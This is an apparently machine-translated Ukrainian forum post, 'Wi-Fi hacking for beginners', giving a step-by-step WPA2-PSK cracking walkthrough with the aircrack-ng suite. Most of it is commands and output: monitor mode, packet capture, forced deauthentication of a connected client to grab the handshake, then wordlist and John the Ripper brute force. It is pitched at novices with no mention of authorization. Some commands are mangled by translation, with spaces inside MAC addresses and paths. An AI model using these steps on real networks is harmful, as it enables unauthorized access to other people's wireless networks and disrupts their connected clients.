Злом wi-fi для новачків.
Злом wi-fi для новачків.
як обходити захист точок і як генерувати хеші для злому WPA за допомогою airolib-ng
Re: Злом wi-fi для новачків.
Додано через 23 години 41 хвилину
злом WPA.
Я буду використовувати Dlink DWL-G122 (USB), бездротової мережевий інтерфейс для цієї процедури. У backtrack4, цей пристрій визнано wlan0.
По-перше, поставити карту в режимі моніторингу:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
# Airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode enabled on mon0)
.
Добре, тепер ми можемо використовувати інтерфейс mon0
Давайте знайдемо бездротову мережу, яка використовує WPA2 / PSK
BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID
00: 19: 5B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -29 0- 1 12 4 TestNet
Зупинимо airodump-ng (ctrl + c) і запустимо його знову, що-б записати все пакети на диск
airodump-ng mon0 --channel 10 --bssid 00: 19: 5B: 52: AD: F7 -w / tmp / wpa2
На даний момент, у вас є 2 варіанти: або чекати, поки клієнт підключиться і 4-handshake буде повним, або deauthenticate існуючих клієнтів і таким чином змусити AP reassociate. Час-гроші, так що давайте змусимо силою deauthenticate. Ми повинні запустити aireplay-ng ввівши BSSID ЗС (-а) і МАС підключеного клієнта (-з)
# Aireplay-ng -0 1 -a 00: 19: 5B: 52: AD: F7 -c 00: 1C: BF: 90: 5B: A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00: 19: 5B: 52: AD: F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00: 1C: BF: 90: 5B: A3] [67 | 66 ACKs]
Як результат, airodump-ng укажeт "WPA Handshake:" у верхньому правому куті
BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID
00: 19: 5B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -27 54-54 0 230
Остановітe airodump-ng і переконайтеся, що файли були створені правильно
root @ bt: / # ls / tmp / wpa2 * -al
Є 2 способи bruteforcing: один, який відносно швидкий, але не гарантує успіху і той, який йде дуже повільно, але гарантує, що ви знайдете ключ через певний момент часу.
Перший варіант є використанням робочого списку / dictionary file. Багато з цих файлів можна знайти в Інтернеті, або можуть бути отримані за допомогою таких інструментів, як John the Ripper. Як тільки список слів буде створений, все що вам потрібно зробити, це запустити Aircrack-ng підставивши файл з Handshake і словник word.txt
aircrack-ng -w /tmp/wordlists/word.lst -b 00: 19: 5B: 52: AD: F7 /tmp/wpa2*.cap
Другий метод (bruteforcing) буде успішним напевно, але це може зайняти багато часу. щоб закінчити. Майте на увазі, WPA2 ключ може бути до 64 символів, так що в теорії що-б побудувати всі поєднання паролів з усіма можливими наборами символів і згодувати їх в Aircrack займе багато часу. Якщо ви хочете використовувати John The Ripper для створення всіх можливих комбінацій паролів і згодувати їх в Aircrack-NG, це команда для використання:
# / Pentest / password / jtr / john --stdout --incremental: all | aircrack-ng -b 00: 19: 5B: 52: AD: F7 -w - /tmp/wpa2*.cap